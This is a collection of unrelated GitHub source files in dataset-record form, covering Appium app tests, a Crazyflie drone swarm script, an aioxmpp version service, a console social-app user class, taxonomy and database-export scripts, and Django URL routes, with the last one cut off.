'platformName': 'Android',\n    #  'platformVersion': '7.1.2', 'deviceName': 'emulator-5554'}\n\n    caps = Options().app(\"D://2023-L/python+selenium/app/01app自动化环境的搭建/dushuwu.apk\").options()\n    driver = webdriver.Remote(command_executor=\"http://127.0.0.1:4723/wd/hub\", desired_capabilities=caps)\n    # driver.implicitly_wait(10)  # implicit wait time\n    # driver.wait_activity(activity=\"\",timeout=10) # wait for a given activity's resources to finish loading\n    driver.find_element(MobileBy.ACCESSIBILITY_ID, \"书城\").click()\n    locator = (MobileBy.XPATH,\n               '//androidx.recyclerview.widget.RecyclerView[@resource-id=\"com.zhao.myreader:id/rv_book_list\"]/android.widget.LinearLayout')\n    book_elements = wait_visibility_all(driver, *locator)\n\n    \"\"\"\n    b. Randomly pick one book as the verification data point\n    \"\"\"\n\n    # Use a random number within the allowed range as the index of the element\n\n    rand_index = random.randint(0, len(book_elements) - 1)\n    print(rand_index)\n    book_element = book_elements[rand_index]\n\n    # c. Collect the verification data from the randomly chosen book\n    book_name = book_element.find_element(MobileBy.ID, \"com.zhao.myreader:id/tv_book_name\").text  # get the book name\n    book_desc = book_element.find_element(MobileBy.ID, \"com.zhao.myreader:id/tv_book_desc\").text  # get the description\n    book_author = book_element.find_element(MobileBy.ID, \"com.zhao.myreader:id/tv_book_author\").text  # get the author name\n\n    # Get each chapter's name and store the chapter names in a dict\n    book_element.click()\n    locator = (MobileBy.ID, 'com.zhao.myreader:id/btn_read_book')\n    read_book = wait_clickable(driver, *locator)\n    read_book.click()\n    locator = (MobileBy.ID, \"com.zhao.myreader:id/tv_content\")\n    content = wait_clickable(driver, *locator)\n    content.click()\n    locator = (MobileBy.ID, \"com.zhao.myreader:id/ll_chapter_list\")\n    chapter_list = wait_clickable(driver, *locator)\n    chapter_list.click()\n    locator = (MobileBy.XPATH, '//*[@resource-id=\"com.zhao.myreader:id/lv_chapter_list\"]/android.widget.LinearLayout')\n    chapter_lists = wait_visibility_all(driver, *locator)\n    book_chapters = dict()\n    # for i in chapter_lists:\n    #     book_chapter.append(i.find_element(MobileBy.ID,\"com.zhao.myreader:id/tv_chapter_title\").text)\n    for index, element in enumerate(chapter_lists):\n        locator = (MobileBy.ID, \"com.zhao.myreader:id/tv_chapter_title\")\n        book_chapters.update({index: wait_visibility(element, *locator).text})\n\n    \"\"\"\n    d. Go back to the search view and search by that book name\n    \"\"\"\n    # Go back twice to the screen with the search button\n    driver.back()\n    time.sleep(3)\n    driver.back()\n    time.sleep(2)\n    # enter the search view\n    locator = (MobileBy.ID, \"com.zhao.myreader:id/iv_search\")\n    search = wait_visibility(driver, *locator)\n    search.click()\n    # type the randomly chosen book name\n    locator = (MobileBy.ID, \"com.zhao.myreader:id/et_search_key\")\n    search_key = wait_visibility(driver, *locator)\n    search_key.send_keys(book_name)\n\n    # search for the book\n    locator = (MobileBy.ID, \"com.zhao.myreader:id/tv_search_conform\")\n    search_conform = wait_visibility(driver, *locator)\n    search_conform.click()\n\n    # get all the matching book entries\n    search_books_elements = driver.find_elements(\n        MobileBy.XPATH, '//*[@resource-id=\"com.zhao.myreader:id/lv_search_books_list\"]/android.widget.LinearLayout')\n    search_index = None\n    for i in search_books_elements:\n        search_book_name = i.find_element(MobileBy.ID, 'com.zhao.myreader:id/tv_book_name').text\n        if search_book_name == book_name:\n            search_index = search_books_elements.index(i)\n\n    if search_index is None:\n        raise ValueError(\"Could not find the book 《{}》\".format(book_name))\n    else:\n\n        search_book = search_books_elements[search_index]\n        # get the book name\n        search_book_name = search_book.find_element(MobileBy.ID, 'com.zhao.myreader:id/tv_book_name').text\n        # get the book description\n        search_book_desc = search_book.find_element(MobileBy.ID, 
'com.zhao.myreader:id/tv_book_desc').text\n        # get the book author\n        search_book_author = search_book.find_element(MobileBy.ID, 'com.zhao.myreader:id/tv_book_author').text\n        # open the selected book\n        search_book.click()\n        search_book_chapters = dict()\n        # tap \"start reading\"\n        locator = (MobileBy.ID, 'com.zhao.myreader:id/btn_read_book')\n        search_read_book = wait_visibility(driver, *locator)\n        search_read_book.click()\n        # tap the book text\n        locator = (MobileBy.ID, \"com.zhao.myreader:id/tv_content\")\n        search_content = wait_visibility(driver, *locator)\n        search_content.click()\n        # tap the table of contents\n        locator = (MobileBy.ID, \"com.zhao.myreader:id/ll_chapter_list\")\n        search_chapter_list = wait_clickable(driver, *locator)\n        search_chapter_list.click()\n        # store the chapter order and chapter titles from the table of contents in a dict\n        locator = (\n            MobileBy.XPATH, '//*[@resource-id=\"com.zhao.myreader:id/lv_chapter_list\"]/android.widget.LinearLayout')\n        search_chapter_lists = wait_visibility_all(driver, *locator)\n        for index, element in enumerate(search_chapter_lists):\n            locator = (MobileBy.ID, \"com.zhao.myreader:id/tv_chapter_title\")\n            search_book_chapters.update(\n                {index: wait_visibility(element, *locator).text})\n\n    assert book_name == search_book_name and book_desc == search_book_desc and book_author == search_book_author and book_chapters == search_book_chapters, \"assertion failed: the data does not match\"\n\n\nif __name__ == \"__main__\":\n    import pytest\n\n    # pytest.main([\"-vs\"])\n    # pytest.main([\"--html=report1.html\"])\n    # pytest.main([\"-vs\", \"--html=report2.html\"])\n    pytest.main([\"--html=./reports/report2.html\", \"--self-contained-html\"])\n","repo_name":"yuxuehong0512/appium_test","sub_path":"appauto/Test_framework/test_frame1.py","file_name":"test_frame1.py","file_ext":"py","file_size_in_byte":7549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38588978448","text":"import time\n\nimport cflib.crtp\nfrom cflib.crazyflie.log import LogConfig\nfrom cflib.crazyflie.swarm import CachedCfFactory\nfrom cflib.crazyflie.swarm import Swarm\nfrom cflib.crazyflie.syncLogger import SyncLogger\n\n# Change uris and sequences according to your setup\nURI1 = 'radio://0/70/2M/E7E7E7E701'\nURI2 = 'radio://0/70/2M/E7E7E7E702'\nURI3 = 'radio://0/70/2M/E7E7E7E703'\nURI4 = 'radio://0/70/2M/E7E7E7E704'\nURI5 = 'radio://0/70/2M/E7E7E7E705'\nURI6 = 'radio://0/70/2M/E7E7E7E706'\nURI7 = 'radio://0/70/2M/E7E7E7E707'\nURI8 = 'radio://0/70/2M/E7E7E7E708'\nURI9 = 'radio://0/70/2M/E7E7E7E709'\nURI10 = 'radio://0/70/2M/E7E7E7E70A'\n\n\nz0 = 0.4\nz = 1.0\n\nx0 = 0.7\nx1 = 0\nx2 = -0.7\n\ny0 = -1.0\ny1 = -0.4\ny2 = 0.4\ny3 = 1.0\n\n# x   y   z  time\nsequence1 = [\n    (x0, y0, z0, 3.0),\n    (x0, y0, z, 30.0),\n    (x0, y0, z0, 3.0),\n]\n\nsequence2 = [\n    (x0, y1, z0, 3.0),\n    (x0, y1, z, 30.0),\n    (x0, y1, z0, 3.0),\n]\n\nsequence3 = [\n    (x0, y2, z0, 3.0),\n    (x0, y2, z, 30.0),\n    (x0, y2, z0, 3.0),\n]\n\nsequence4 = [\n    (x0, y3, z0, 3.0),\n    (x0, y3, z, 30.0),\n    (x0, y3, z0, 3.0),\n]\n\nsequence5 = [\n    (x1, y1, z0, 3.0),\n    (x1, y1, z, 30.0),\n    (x1, y1, z0, 3.0),\n]\n\nsequence6 = [\n    (x1, y2, z0, 3.0),\n    (x1, y2, z, 30.0),\n    (x1, y2, z0, 3.0),\n]\n\nsequence7 = [\n    (x2, y0, z0, 3.0),\n    (x2, y0, z, 30.0),\n    (x2, y0, z0, 3.0),\n]\n\nsequence8 = [\n    (x2, y1, z0, 3.0),\n    (x2, y1, z, 30.0),\n    (x2, y1, z0, 3.0),\n]\n\nsequence9 = [\n    (x2, y2, z0, 3.0),\n    (x2, y2, z, 30.0),\n    (x2, y2, z0, 3.0),\n]\n\nsequence10 = [\n    (x2, y3, z0, 3.0),\n    (x2, y3, z, 30.0),\n    (x2, y3, z0, 3.0),\n]\n\nseq_args = {\n    URI1: [sequence1],\n    URI2: [sequence2],\n    URI3: [sequence3],\n    URI4: [sequence4],\n    URI5: [sequence5],\n    URI6: 
[sequence6],\n URI7: [sequence7],\n URI8: [sequence8],\n URI9: [sequence9],\n URI10: [sequence10],\n}\n\n# List of URIs, comment the one you do not want to fly\nuris = {\n URI1,\n URI2,\n URI3,\n URI4,\n URI5,\n URI6,\n URI7,\n URI8,\n URI9,\n URI10\n}\n\n\ndef wait_for_position_estimator(scf):\n print('Waiting for estimator to find position...')\n\n log_config = LogConfig(name='Kalman Variance', period_in_ms=500)\n log_config.add_variable('kalman.varPX', 'float')\n log_config.add_variable('kalman.varPY', 'float')\n log_config.add_variable('kalman.varPZ', 'float')\n\n var_y_history = [1000] * 10\n var_x_history = [1000] * 10\n var_z_history = [1000] * 10\n\n threshold = 0.001\n\n with SyncLogger(scf, log_config) as logger:\n for log_entry in logger:\n data = log_entry[1]\n\n var_x_history.append(data['kalman.varPX'])\n var_x_history.pop(0)\n var_y_history.append(data['kalman.varPY'])\n var_y_history.pop(0)\n var_z_history.append(data['kalman.varPZ'])\n var_z_history.pop(0)\n\n min_x = min(var_x_history)\n max_x = max(var_x_history)\n min_y = min(var_y_history)\n max_y = max(var_y_history)\n min_z = min(var_z_history)\n max_z = max(var_z_history)\n\n # print(\"{} {} {}\".\n # format(max_x - min_x, max_y - min_y, max_z - min_z))\n\n if (max_x - min_x) < threshold and (\n max_y - min_y) < threshold and (\n max_z - min_z) < threshold:\n break\n\n\ndef wait_for_param_download(scf):\n while not scf.cf.param.is_updated:\n time.sleep(1.0)\n print('Parameters downloaded for', scf.cf.link_uri)\n\n\ndef reset_estimator(scf):\n cf = scf.cf\n cf.param.set_value('kalman.resetEstimation', '1')\n time.sleep(0.1)\n cf.param.set_value('kalman.resetEstimation', '0')\n\n wait_for_position_estimator(cf)\n\n\ndef take_off(cf, position):\n take_off_time = 1.0\n sleep_time = 0.1\n steps = int(take_off_time / sleep_time)\n vz = position[2] / take_off_time\n\n print(vz)\n\n for i in range(steps):\n cf.commander.send_velocity_world_setpoint(0, 0, vz, 0)\n time.sleep(sleep_time)\n\n\ndef land(cf, position):\n landing_time = 1.0\n sleep_time = 0.1\n steps = int(landing_time / sleep_time)\n vz = -position[2] / landing_time\n\n print(vz)\n\n for _ in range(steps):\n cf.commander.send_velocity_world_setpoint(0, 0, vz, 0)\n time.sleep(sleep_time)\n\n cf.commander.send_stop_setpoint()\n # Make sure that the last packet leaves before the link is closed\n # since the message queue is not flushed before closing\n time.sleep(0.1)\n\n\ndef run_sequence(scf, sequence):\n try:\n cf = scf.cf\n\n take_off(cf, sequence[0])\n for position in sequence:\n print('Setting position {}'.format(position))\n end_time = time.time() + position[3]\n while time.time() < end_time:\n cf.commander.send_position_setpoint(position[0],\n position[1],\n position[2], 0)\n time.sleep(0.1)\n land(cf, sequence[-1])\n except Exception as e:\n print(e)\n\n\nif __name__ == '__main__':\n # logging.basicConfig(level=logging.DEBUG)\n cflib.crtp.init_drivers(enable_debug_driver=False)\n\n factory = CachedCfFactory(rw_cache='./cache')\n with Swarm(uris, factory=factory) as swarm:\n # If the copters are started in their correct positions this is\n # probably not needed. The Kalman filter will have time to converge\n # any way since it takes a while to start them all up and connect. We\n # keep the code here to illustrate how to do it.\n # swarm.parallel(reset_estimator)\n\n # The current values of all parameters are downloaded as a part of the\n # connections sequence. 
Since we have 10 copters this is clogging up\n # communication and we have to wait for it to finish before we start\n # flying.\n print('Waiting for parameters to be downloaded...')\n swarm.parallel(wait_for_param_download)\n\n swarm.parallel(run_sequence, args_dict=seq_args)\n","repo_name":"hibetterheyj/Crazyflie_Auto_Navigation_Landing","sub_path":"code/crazyflie-lib-python/examples/swarm/swarmSequence.py","file_name":"swarmSequence.py","file_ext":"py","file_size_in_byte":6039,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"43579743605","text":"\"\"\"\nA module used for communication between the server and the applications.\nAlso can be used to set up an environment for the applications to run\nas standalone python scripts.\n\"\"\"\n\nfrom dynamo.core.inventory import ObjectRepository\n\n## Whether this process has elevated privileges\nauthorized = False\n\n## Handle to the inventory\ninventory = ObjectRepository()\n\n## Handle to the authorizer part of the master server\nauthorizer = None\n\n## Make a standard logger that outputs to sys.stdout and sys.stderr\nimport sys\nimport logging\n\ndef make_standard_logger(level):\n log_level = getattr(logging, level.upper())\n log_format = '%(asctime)s:%(levelname)s:%(name)s: %(message)s'\n \n # Everything above log_level goes to stdout\n out_handler = logging.StreamHandler(sys.stdout)\n out_handler.setLevel(log_level)\n out_handler.setFormatter(logging.Formatter(fmt = log_format))\n # If >= ERROR, goes also to stderr\n err_handler = logging.StreamHandler(sys.stderr)\n err_handler.setLevel(logging.ERROR)\n err_handler.setFormatter(logging.Formatter(fmt = log_format))\n \n logger = logging.getLogger()\n logger.setLevel(log_level)\n logger.addHandler(out_handler)\n logger.addHandler(err_handler)\n\n return logger\n","repo_name":"SmartDataProjects/dynamo","sub_path":"lib/core/executable.py","file_name":"executable.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32684320846","text":"########################################################################\n# File name: service.py\n# This file is part of: aioxmpp\n#\n# LICENSE\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this program. If not, see\n# .\n#\n########################################################################\nimport asyncio\nimport typing\n\nimport aioxmpp\nimport aioxmpp.disco\nimport aioxmpp.errors\nimport aioxmpp.service\n\nfrom . import xso as version_xso\n\n\nclass VersionServer(aioxmpp.service.Service):\n \"\"\"\n :class:`~aioxmpp.service.Service` which handles inbound :xep:`92` Software\n Version requests.\n\n .. warning::\n\n Do **not** depend on this service in another service. This service\n exposes possibly private or sensitive information over the XMPP\n network without any filtering. 
Implicitly summoning this service via\n a dependency is thus discouraged.\n\n *If* you absolutely need to do this for the implementation of another\n published XEP, please file an issue against :mod:`aioxmpp` so that we\n can work out a good solution.\n\n .. warning::\n\n This service does answer version queries, no matter who asks. This may\n not be desirable, in which case this service is not for you.\n\n .. seealso::\n\n :func:`~.version.query_version`\n for a function to obtain another entities software version.\n\n .. note::\n\n By default, this service does not reply to version queries. The\n :attr:`name` attribute needs to be set first.\n\n The response can be configured with the following attributes:\n\n .. autoattribute:: name\n :annotation: = None\n\n .. autoattribute:: version\n :annotation: = None\n\n .. autoattribute:: os\n :annotation: = distro.name() or platform.system()\n \"\"\"\n\n ORDER_AFTER = [\n aioxmpp.disco.DiscoServer,\n ]\n\n disco_feature = aioxmpp.disco.register_feature(\n \"jabber:iq:version\",\n )\n\n def __init__(self, client, **kwargs):\n super().__init__(client, **kwargs)\n try:\n import distro\n except ImportError:\n import platform\n self._os = platform.system()\n else:\n self._os = distro.name()\n\n self._name = None\n self._version = None\n\n @property\n def os(self) -> typing.Optional[str]:\n \"\"\"\n The operating system of this entity.\n\n Defaults to :func:`distro.name` or :func:`platform.system` (if\n :mod:`distro` is not available).\n\n This attribute can be set to :data:`None` or deleted to prevent\n inclusion of the OS element in the reply.\n \"\"\"\n return self._os\n\n @os.setter\n def os(self, value: typing.Optional[str]):\n if value is None:\n self._os = None\n else:\n self._os = str(value)\n\n @os.deleter\n def os(self):\n self._os = None\n\n @property\n def name(self) -> typing.Optional[str]:\n \"\"\"\n The software name of this entity.\n\n Defaults to :data:`None`.\n\n If this attribute is :data:`None`, version requests are not answered\n but fail with a ``service-unavailable`` error.\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, value: typing.Optional[str]):\n if value is None:\n self._name = None\n else:\n self._name = str(value)\n\n @name.deleter\n def name(self):\n self._name = None\n\n @property\n def version(self) -> typing.Optional[str]:\n \"\"\"\n The software version of this entity.\n\n Defaults to :data:`None`.\n\n If this attribute is :data:`None` or the empty string, the version will\n be shown as ``\"unspecified\"`` to other entities. 
This can be used to\n        avoid disclosing the specific version of the software.\n        \"\"\"\n        return self._version\n\n    @version.setter\n    def version(self, value: typing.Optional[str]):\n        if value is None:\n            self._version = None\n        else:\n            self._version = str(value)\n\n    @version.deleter\n    def version(self):\n        self._version = None\n\n    @aioxmpp.service.iq_handler(aioxmpp.IQType.GET,\n                                version_xso.Query)\n    async def handle_query(self, iq: aioxmpp.IQ) -> version_xso.Query:\n        if self._name is None:\n            raise aioxmpp.errors.XMPPCancelError(\n                aioxmpp.errors.ErrorCondition.SERVICE_UNAVAILABLE,\n            )\n\n        result = version_xso.Query()\n        result.name = self._name\n        result.os = self._os\n        result.version = self._version or \"unspecified\"\n        return result\n\n\nasync def query_version(stream: aioxmpp.stream.StanzaStream,\n                        target: aioxmpp.JID) -> version_xso.Query:\n    \"\"\"\n    Query the software version of an entity.\n\n    :param stream: A stanza stream to send the query on.\n    :type stream: :class:`aioxmpp.stream.StanzaStream`\n    :param target: The address of the entity to query.\n    :type target: :class:`aioxmpp.JID`\n    :raises OSError: if a connection issue occurred before a reply was received\n    :raises aioxmpp.errors.XMPPError: if an XMPP error was returned instead\n        of a reply.\n    :rtype: :class:`aioxmpp.version.xso.Query`\n    :return: The response from the peer.\n\n    The response is returned as :class:`~aioxmpp.version.xso.Query` object. The\n    attributes hold the data returned by the peer. Each attribute may be\n    :data:`None` if the peer chose to omit that information. In an extreme\n    case, all attributes are :data:`None`.\n    \"\"\"\n\n    return await stream.send(aioxmpp.IQ(\n        type_=aioxmpp.IQType.GET,\n        to=target,\n        payload=version_xso.Query(),\n    ))\n","repo_name":"horazont/aioxmpp","sub_path":"aioxmpp/version/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":6283,"program_lang":"python","lang":"en","doc_type":"code","stars":215,"dataset":"github-code","pt":"21"} +{"seq_id":"37145040336","text":"from datetime import datetime\n\nfrom .feedreel import FeedReel\nfrom .feedpost import FeedPost\nfrom .feedstory import FeedStory\nfrom .audio_file import AudioFile\nfrom .business import Business\n\n\nclass User(Business):\n    \"\"\"\n    Platform users creation\n    \"\"\"\n    username = None\n    bio = None\n    followers = 0\n    following = 0\n    address = None\n\n    def __init__(self, username, bio=None, **kwargs):\n        self.username = username\n        self.user_pic = []\n        self.load_userpic()\n        self.bio = bio\n        self.user_new_attributes = kwargs\n        for key, value in kwargs.items():\n            setattr(self, key, value)\n\n    def load_userpic(self):\n        print('Load your picture and hit Ctrl-D',\n              'or Ctrl-Z (Windows) to save it.')\n        while True:\n            try:\n                line = input()\n            except EOFError:\n                break\n            self.user_pic.append(line)\n        try:\n            if line:\n                return True\n        except UnboundLocalError:\n            print('Picture load failed')\n            return False\n\n    def print_userpic(self):\n        if self.user_pic:\n            print('')\n            for linea in self.user_pic:\n                if linea:\n                    print(linea)\n            print('')\n\n    def show_followers(self):\n        '''\n        Prints the number of followers for the instance\n        '''\n        print(f'This user has {self.followers} followers')\n\n    def show_following(self):\n        '''\n        Prints the number of accounts this user follows\n        '''\n        print(f'This user follows {self.following} users')\n\n    def show_bio(self):\n        if self.bio:\n            return self.bio\n        else:\n            return \"This user doesn't have a bio\"\n\n    def read_user(self):\n        print('#'*15, 'USER', '#'*15)\n        print(self.username)\n        self.print_userpic()\n        
self.show_bio()\n print('Address: ')\n print(self.address)\n self.show_followers()\n self.show_following()\n for key, value in self.user_new_attributes.items():\n print(f'{key} = {value}')\n print('#'*80)\n\n def read_feed(self, feed):\n for post in feed:\n post.read()\n\n def post(self):\n description = input('Add your post description\\n>')\n print('Type:\\n 1. To type your location\\n',\n '2. To pick a random one')\n location_choice = int(input('>'))\n if location_choice == 1:\n location = input('Type your location: ')\n else:\n location = FeedPost.get_location()\n new_post = FeedPost(location, description)\n\n if new_post.load_picture(\"picture\"):\n print(\"Picture loaded!\")\n else:\n print(\"Couldn't load picture\")\n return False\n new_post.set_filter()\n new_post.tag_people()\n return new_post\n\n def story(self):\n description = input('Add the title for your story\\n>')\n print('Type:\\n 1. To enter a personalized created time\\n',\n '2. To set it automatically')\n creation_choice = int(input('>'))\n if creation_choice == 1:\n print(\"Type the created time in the 'dd/mm/yyyy 24:00:00' format\")\n created = datetime.strptime(input('>'), '%d/%m/%Y %H:%M:%S')\n else:\n created = datetime.now()\n print('Created time: ', created.strftime(\"%d/%m/%Y %H:%M:%S\"))\n new_story = FeedStory(created, description)\n story_picture = input(\n 'Do you want to load a picture with your story? Y/N\\n>').title()\n if story_picture == 'Y':\n if new_story.load_picture(\"picture\"):\n print(\"Picture loaded!\")\n else:\n print(\"Couldn't load picture\")\n return False\n elif story_picture == 'N':\n new_story.picture = None\n new_story.set_typography()\n new_story.tag_people()\n return new_story\n\n def reel(self):\n description = input('Add a title for your reel\\n>')\n new_reel = FeedReel(description)\n if new_reel.load_picture(\"video\"):\n print(\"Video loaded!\")\n else:\n print(\"Couldn't load video\")\n return False\n reel_music = input(\n 'Do you want background music in the reel? Y/N\\n>').title()\n if reel_music == 'Y':\n new_reel.add_music()\n new_reel.music = AudioFile(new_reel.music_background)\n elif reel_music == 'N':\n new_reel.music_background = None\n reel_effect = input(\n 'Do you want a visual effect in the reel? 
Y/N\\n>').title()\n if reel_effect == 'Y':\n new_reel.add_effects()\n elif reel_effect == 'N':\n new_reel.visual_effect = None\n return new_reel\n\n def give_likes(self, item):\n item.likes += 1\n return True\n\n\nclass Address:\n \"\"\"docstring for Address.\"\"\"\n\n def __init__(self, street, city, state, zipcode, street2=''):\n self.street = street\n self.city = city\n self.state = state\n self.zipcode = zipcode\n self.street2 = street2\n\n def __str__(self):\n lines = [self.street]\n if self.street2:\n lines.append(self.street2)\n lines.append(f'{self.city}, {self.state} {self.zipcode}')\n return '\\n'.join(lines)\n","repo_name":"Jhilbran/Instagram_console_test","sub_path":"modules/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":5368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7299008827","text":"from ete3 import NCBITaxa\nimport itertools\n\nZhangZhaoGenera = []\nwith open('/home/ubuntu/MATLAB/GutMicrobiota/output/writeETEFiles/ZhangZhaoGenera.txt') as f:\n for line in f:\n ZhangZhaoGenera.append(line.strip())\n f.close()\n\nForslundHildebrandGenera = []\nwith open('/home/ubuntu/MATLAB/GutMicrobiota/output/writeETEFiles/ForslundHildebrandGenera.txt') as f:\n for line in f:\n ForslundHildebrandGenera.append(line.strip())\n f.close()\n\nRefSeqSpecies = []\nwith open('/home/ubuntu/MATLAB/GutMicrobiota/input/reference_genomes.txt') as f:\n next(f)\n for line in f:\n words = line.split('\\t')\n RefSeqSpecies.append(words[0])\n f.close()\n\nncbi = NCBITaxa()\nname2taxid = ncbi.get_name_translator(list(set(ZhangZhaoGenera+ForslundHildebrandGenera+RefSeqSpecies)))\n\ntree = ncbi.get_topology(list(itertools.chain.from_iterable(list(name2taxid.values()))),intermediate_nodes=True)\n#print(tree.get_ascii(attributes=['sci_name']), file=open('/home/ubuntu/taxonomy.txt','w'))\n\n#print(tree.name)\n# fh = open('/home/ubuntu/MATLAB/GutMicrobiota/output/writeETEFiles/closestSpecies.txt','w')\n# for genus in ZhangZhaoGenera+ForslundHildebrandGenera:\n# print(genus)\n# minDist = -1\n# minDistSpecies = ''\n# for species in RefSeqSpecies:\n# genusNode = tree.search_nodes(name=str(name2taxid[genus][0]))[0]\n# speciesNode = tree.search_nodes(name=str(name2taxid[species][0]))[0]\n# dist = tree.get_distance(speciesNode, genusNode)\n# if minDist == -1:\n# minDist = dist\n# minDistSpecies = species\n# elif minDist > dist:\n# minDist = dist\n# minDistSpecies = species\n# print(genus+\" \"+minDistSpecies+\" \"+str(minDist))\n# print(genus+\"\\t\"+minDistSpecies,file=fh)\n# fh.close()\n\nfh = open('/home/ubuntu/MATLAB/GutMicrobiota/output/writeETEFiles/allDescendants.txt','w')\nfor genus in ZhangZhaoGenera+ForslundHildebrandGenera:\n print(genus)\n genusNode = tree.search_nodes(name=str(name2taxid[genus][0]))[0]\n #descendants = genusNode.get_descendants()\n #descendantNames = []\n #for d in descendants:\n # descendantNames.append(d.name)\n descendants = ncbi.get_descendant_taxa(str(name2taxid[genus][0]),intermediate_nodes=True)\n descendantNames = [str(name2taxid[genus][0])]\n for d in descendants:\n descendantNames.append(str(d))\n fh.write(genus+\"\\t\"+\",\".join(descendantNames))#,file=fh)\nfh.close()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"yw595/GutMicrobiota","sub_path":"makeETEFiles.py","file_name":"makeETEFiles.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43039849847","text":"def 
main():\n    n, q = map(int, input().split())\n    point_list = []\n    for _ in range(n):\n        x, y = map(int, input().split())\n        point_list.append((x, y))\n\n    # (1, 0) -> (1, 1)\n    # (0, 1) -> (1, -1)\n    new_point_list = []\n    for x, y in point_list:\n        new_x = x + y\n        new_y = x - y\n        new_point_list.append((new_x, new_y))\n\n    x_list = []\n    y_list = []\n    for x, y in new_point_list:\n        x_list.append(x)\n        y_list.append(y)\n    x_max = max(x_list)\n    x_min = min(x_list)\n    y_max = max(y_list)\n    y_min = min(y_list)\n\n    ans_list = []\n    for _ in range(q):\n        i = int(input())\n        i -= 1\n        x, y = new_point_list[i]\n        ans = -1\n        ans = max(ans, x_max-x)\n        ans = max(ans, x-x_min)\n        ans = max(ans, y_max-y)\n        ans = max(ans, y-y_min)\n        ans_list.append(ans)\n\n    print(*ans_list, sep='\\n')\n\n\nmain()\n","repo_name":"batamorphism/coding","sub_path":"Python/AtCoder/old/typical90_0330.py","file_name":"typical90_0330.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6491511083","text":"import os\n\nimport pymysql\nimport csv\n\n# The data is ready; work out how to write it into Excel\n\n\ndef csv_dict_write(path,head,data):\n    with open(path,'w',encoding='utf-8',newline='') as f:\n        writer = csv.DictWriter(f,head)\n        writer.writeheader()\n        writer.writerows(data)\n    return True\n\n\n\nif __name__ =='__main__':\n    connection = pymysql.connect(host='127.0.0.1', port=3306, user='root', password='123456', db='hk_stock',\n                                 charset='utf8mb4', cursorclass=pymysql.cursors.DictCursor)\n    cur = connection.cursor()\n\n    # SQL statement\n    count_sql = \"select count(*) from hk_FinData1; \"\n    cur.execute(count_sql)\n    long_count = cur.fetchone()['count(*)']\n    # SQL statement\n    big_list = []\n    for num in range(1, long_count + 1):\n\n\n        sql = 'select code,d1,d2,d3,d4,d5,d6,d7,d8 from hk_FinData1 where id = %s ' % num\n        # # execute the SQL statement\n        cur.execute(sql)\n        # # fetch the record\n        data = cur.fetchone()\n        big_list.append(data)\n    print(big_list)\n    head = ['code','d1','d2','d3','d4','d5','d6','d7','d8']\n    l_path = os.getcwd()\n    csv_dict_write('{0}/hk50_Fdata.csv'.format(l_path),head,big_list)\n    print(\"Data export finished~\")\n","repo_name":"mojoru2023/HK_stocks","sub_path":"恒生指数成分股模型/从数据库导出数据/mysql_python.py","file_name":"mysql_python.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"17986636970","text":"from django.urls.conf import path, re_path\n\nfrom .views import tag_detail, tag_list, startup_list, startup_detail, TagCreate, StartupCreate, NewsLinkCreate, NewsLinkUpdate, TagUpdate, NewsLinkDelete, TagDelete, StartupDelete, StartupUpdate\n\nurlpatterns = [\n    re_path(r'^newslink/create/$', NewsLinkCreate.as_view(), name='organizer_newslink_create'),\n    re_path(r'^newslink/delete/(?P<pk>\\d+)/$', NewsLinkDelete.as_view(), name='organizer_newslink_delete'),\n    re_path(r'^newslink/update/(?P<pk>\\d+)/$', NewsLinkUpdate.as_view(), name= 'organizer_newslink_update'),\n    re_path(r'^startup/$', startup_list, name='organizer_startup_list'),\n    re_path(r'^startup/create/$', StartupCreate.as_view(), name='organizer_startup_create'),\n    re_path(r'^startup/(?P<slug>[\\w\\-]+)/update/$', StartupUpdate.as_view(), name='organizer_startup_update'),\n    re_path(r'^startup/(?P<slug>[\\w\\-]+)/$', startup_detail, name='organizer_startup_detail'),\n    re_path(r'^startup/(?P<slug>[\\w\\-]+)/delete/$', StartupDelete.as_view(), name='organizer_startup_delete'),\n    re_path(r'^tag/$', tag_list, name='organizer_tag_list'),\n    re_path(r'^tag/create/$', TagCreate.as_view(), 
